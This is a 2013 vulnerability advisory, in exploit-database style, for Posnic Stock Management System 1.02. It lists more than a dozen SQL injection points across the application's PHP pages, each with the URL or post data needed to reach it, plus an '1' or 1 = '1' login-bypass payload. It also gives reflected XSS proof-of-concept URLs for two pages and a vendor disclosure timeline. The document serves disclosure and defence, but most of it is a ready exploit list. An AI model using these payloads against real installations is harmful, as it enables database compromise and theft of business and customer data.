# Exploit Title: Posnic Stock Management System 1.02 Multiple Vulnerabilities # Date: 26 Sep 2013 # Vendor Homepage: http://www.posnic.com # Software Link: http://sourceforge.net/projects/stockmanagement/?source=directory # Version: 1.02 # Tested on: Win 7/Backtrack # CVE : # Exploit Author: Sarahma Security # Author Homepage: http://sarahma.co.id # Author Email: research@sarahma.co.id ======================== SQL Injection ======================== Found on http://localhost/posnic/change_password.php parameter : old_pass post data : change_pass=Save&confirm_pass=acUn3t1x&new_pass=acUn3t1x&old_pass=1{SQL_HERE} Found on http://localhost/posnic/forget_pass.php parameter : name Payload : 1' or 1 = '1 Found on http://localhost/posnic/update_sales.php parameter : sid http://localhost/posnic/update_sales.php?sid=22{SQL_HERE}&table=stock_sales&return=view_sales.php Found on http://localhost/posnic/update_customer_details.php parameter : sid http://localhost/posnic/update_customer_details.php?sid=9{SQL_HERE}&table=customer_details&return=view_customers.php Found on http://localhost/posnic/update_purchase.php parameter : sid http://localhost/posnic/update_purchase.php?sid=SD263{SQL_HERE}&table=stock_entries&return=view_purchase.php Found on http://localhost/posnic/update_supplier.php parameter : sid http://localhost/posnic/update_supplier.php?sid=38{SQL_HERE}&table=supplier_details&return=view_supplier.php Found on http://localhost/posnic/update_stock.php parameter : sid http://localhost/posnic/update_stock.php?sid=35{SQL_HERE}&table=stock_details&return=view_product.php Found on http://localhost/posnic/update_payment.php parameter : sid http://localhost/posnic/update_payment.php?sid=SD266{SQL_HERE}&table=stock_entries&return=view_payments.php Found on http://localhost/posnic/view_sales.php parameter : searchtxt post data : searchtxt=12{SQL_HERE}&Search=Search Found on http://localhost/posnic/view_customers.php parameter : searchtxt post data : searchtxt=12{SQL_HERE}&Search=Search Found on http://localhost/posnic/view_purchase.php parameter : searchtxt post data : searchtxt=12{SQL_HERE}&Search=Search Found on http://localhost/posnic/view_supplier.php parameter : searchtxt post data : searchtxt=12{SQL_HERE}&Search=Search Found on http://localhost/posnic/view_product.php parameter : searchtxt post data : searchtxt=12{SQL_HERE}&Search=Search Found on http://localhost/posnic/view_payments.php parameter : searchtxt post data : searchtxt=12{SQL_HERE}&Search=Search ======================== XSS Vulnerability ======================== Found On http://localhost/posnic/forget_pass.php parameter : msg Ex : http://localhost/posnic/forget_pass.php?msg=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E Found On http://localhost/posnic/index.php parameter : msg http://localhost/posnic/index.php?msg=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&type=error ======================== Solution : ======================== No Update Until This Advisory published ======================== Timeline: ======================== 2013-09-19 Provided details vulnerability to vendor 2013-09-22 Vendor Reply Message 2013-09-25 No Response From Vendor 2013-09-26 Advisory published #################### ______ __ ______ / \ / | / \ /000000 | ______ ______ ______ 00 |____ _____ ____ ______ /000000 | ______ _______ 00 \__00/ / \ / \ / \ 00 \ / \/ \ / \ 00 \__00/ / \ / | 00 \ 000000 |/000000 |000000 |0000000 |000000 0000 | 000000 | 00 \ /000000 |/0000000/ 000000 | / 00 |00 | 00/ / 00 |00 | 00 |00 | 00 | 00 | / 00 | 000000 |00 00 |00 | / \__00 |/0000000 |00 | /0000000 |00 | 00 |00 | 00 | 00 |/0000000 | / \__00 |00000000/ 00 \_____ 00 00/ 00 00 |00 | 00 00 |00 | 00 |00 | 00 | 00 |00 00 | 00 00/ 00 |00 | 000000/ 0000000/ 00/ 0000000/ 00/ 00/ 00/ 00/ 00/ 0000000/ 000000/ 0000000/ 0000000/ #####################